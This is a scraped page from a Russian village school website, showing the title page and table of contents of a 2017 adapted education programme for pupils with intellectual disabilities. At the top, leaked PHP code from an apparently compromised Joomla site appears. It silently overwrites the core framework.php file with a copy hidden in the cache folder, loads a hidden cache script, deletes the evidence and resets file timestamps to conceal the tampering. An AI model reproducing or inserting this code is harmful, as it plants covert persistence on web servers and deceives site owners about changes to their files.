$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } АООП образования обучающихся с УО

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209854

На сайте

Сейчас 15 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

АООП образования обучающихся с УО

Муниципальное бюджетное общеобразовательное учреждение

«Сагарчинская  средняя общеобразовательная школа

Акбулакского района Оренбургской области»

УТВЕРЖДАЮ

Директор муниципального бюджетного общеобразовательного учреждения «Сагарчинская  средняя общеобразовательная школа  Акбулакского района Оренбургской области»

____________________ А.А. Жусупова

Приказ № ___     от 30.08.2017 г.                          

Адаптированная

основная образовательная программа образования обучающихся

с умственной отсталостью

(интеллектуальными нарушениями) муниципального бюджетного общеобразовательного учреждения «Сагарчинская  средняя общеобразовательная школа  Акбулакского района

Оренбургской области»

(УРОВЕНЬ НАЧАЛЬНОГО ОБЩЕГО ОБРАЗОВАНИЯ)

Рассмотрено на педагогическом совете, протокол № 1 от 30.08.2017 г.

2017 г.

 

ОГЛАВЛЕНИЕ

 

 

 

 

1.

ОБЩИЕ ПОЛОЖЕНИЯ

4

     

2.

АДАПТИРОВАННАЯ  ОСНОВНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ ПРОГРАММА ОБРАЗОВАНИЯ ОБУЧАЮЩИХСЯ С ЛЕГКОЙ УМСТВЕННОЙ ОТСТАЛОСТЬЮ (ИНТЕЛЛЕКТУАЛЬНЫМИ НАРУШЕНИЯМИ) (ВАРИАНТ 1)

 

 

 

 

 

9

2.1.

Целевой раздел ……………………………………………..

9

 

2.1.1. Пояснительная записка ………………………………

9

 

2.1.2. Планируемые результаты освоения обучающимися с легкой умственной отсталостью (интеллектуальными нарушениями) адаптированной основной образовательной программы ………………………………

18

 

2.1.3. Система оценки достижения обучающимися с легкой умственной отсталостью (интеллектуальными нарушениями) планируемых результатов освоения адаптированной основной общеобразовательной программы …………………………………………………...

42

2.2.

Содержательный раздел …………………………………

53

 

2.2.1. Программа формирования базовых учебных действий ..…………………………………………………….

53

 

2.2.2. Программы учебных предметов, курсов коррекционно-развивающей области ………………………

65

 

2.2.3. Программа духовно-нравственного развития ……..

152

 

2.2.4. Программа формирования экологической культуры, здорового и безопасного образа жизни …………………….

164

 

2.2.5. Программа коррекционной работы ………………….

174

 

2.2.6. Программа внеурочной деятельности ……………….

199

2.3.

Организационный раздел ……………………………….

203

 

2.3.1. Учебный план …………………………………………

203

 

2.3.2. Система условий реализации адаптированной основной общеобразовательной программы образования обучающихся с легкой умственной отсталостью …………

210

     

3.

АДАПТИРОВАННАЯ  ОСНОВНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ ПРОГРАММА ОБРАЗОВАНИЯ ОБУЧАЮЩИХСЯ С УМЕРЕННОЙ, ТЯЖЕЛОЙ И ГЛУБОКОЙ УМСТВЕННОЙ ОТСТАЛОСТЬЮ (ИНТЕЛЛЕКТУАЛЬНЫМИ НАРУШЕНИЯМИ), ТЯЖЕЛЫМИ И МНОЖЕСТВЕННЫМИ НАРУШЕНИЯМИ РАЗВИТИЯ (ВАРИАНТ 2)

216

3.1.

Целевой раздел ……………………………………………..

216

 

3.1.1. Пояснительная записка ………………………………

216

 

3.1.2. Планируемые результаты освоения обучающимися с умеренной, тяжелой и глубокой умственной отсталостью (интеллектуальными нарушениями), тяжелыми и множественными нарушениями развития адаптированной основной общеобразовательной программы …………………………………………………...

227

 

3.1.3. Система оценки достижения обучающимися с умеренной, тяжелой и глубокой умственной отсталостью (интеллектуальными нарушениями), тяжелыми и множественными нарушениями развития планируемых результатов освоения адаптированной основной общеобразовательной программы …………………………

234

3.2.

Содержательный раздел …………………………………

236

 

3.2.1. Программа формирования базовых учебных действий ..…………………………………………………….

236

 

3.2.2. Программы учебных предметов, курсов коррекционно-развивающей области ………………………

237

 

3.2.3. Программа нравственного развития …………………

288

 

3.2.4. Программа формирования экологической культуры, здорового и безопасного образа жизни …………………….

290

 

3.2.5. Программа внеурочной деятельности ………………

291

 

3.2.6. Программа сотрудничества с семьей обучающегося

294

3.3.

Организационный раздел ……………………………….

298

 

3.3.1. Учебный план …………………………………………

298

 

3.3.2. Система условий реализации адаптированной основной общеобразовательной программы образования обучающихся с умеренной, тяжелой и глубокой умственной отсталостью (интеллектуальными нарушениями), тяжелыми и множественными нарушениями развития ……………………………………...

307